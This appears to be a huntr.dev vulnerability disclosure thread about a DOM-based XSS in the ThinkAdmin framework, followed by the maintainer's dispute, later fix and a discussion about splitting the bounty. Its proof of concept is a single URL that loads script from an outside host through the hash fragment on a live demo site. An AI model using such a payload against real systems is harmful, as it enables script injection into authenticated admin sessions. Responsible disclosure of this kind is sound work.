Cross-site Scripting (XSS) - DOM in zoujingli/thinkadmin

Valid

Reported on

Sep 15th 2021


Description

DOM-based XSS via URL hash fragment

Proof of Concept

First log in to https://v6.thinkadmin.top, then visit https://v6.thinkadmin.top/admin.html#https://bbounty.000webhostapp.com/cors.php?id=xxxxx2 and see that the XSS is executed.

Impact

DOM-based XSS via URL hash fragment

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back 2 months ago
邹景立 has invalidated this vulnerability 2 months ago

The framework design needs to use the hash to load page resources, and it allows the use of JavaScript. Therefore, such problems are inevitable, and the feature needs to be used.

The disclosure bounty has been dropped
The fix bounty has been dropped
ranjit-git
2 months ago

Researcher


If you want to load a hash fragment, then only allow a server URL.
Here you can see I can set any arbitrary URL and it will fetch the data.

ranjit-git
2 months ago

Researcher


Here in my PoC URL you can see it fetches any URL. But you need to set the URL to be fetched from your own server.

邹景立
2 months ago

Maintainer


I'm very sorry. After careful consideration, I decided to fix this problem, but it has been closed and can't be marked.

ranjit-git
2 months ago

Researcher


@admin I am asking the admin to re-open this bug so that you can validate the bug.

邹景立
2 months ago

Maintainer


OK, I also suggest the administrator to reopen it!

Jamie Slome
2 months ago

Admin


I have updated the report to pending - feel free to mark it as you please!

邹景立 validated this vulnerability 2 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
邹景立 confirmed that a fix has been merged on 4469f7 2 months ago
邹景立 has been awarded the fix bounty
0x9x
2 months ago

Nice find!

Jamie Slome
2 months ago

Admin


@maintainer - just jumping in here!

We just want to know if you perceive this report to be a duplicate of:

https://huntr.dev/bounties/5c129785-cf80-4123-b869-3945b386139a/

邹景立
2 months ago

Maintainer


@admin Confirm duplicate report.

0x9x
2 months ago

I confirm the duplicated report, but not the verbose error reported on my original report. So I hope you can also accept my report.

Jamie Slome
2 months ago

Admin


As we are in a unique situation, would both researchers be happy to split the bounty for the disclosure, half/half?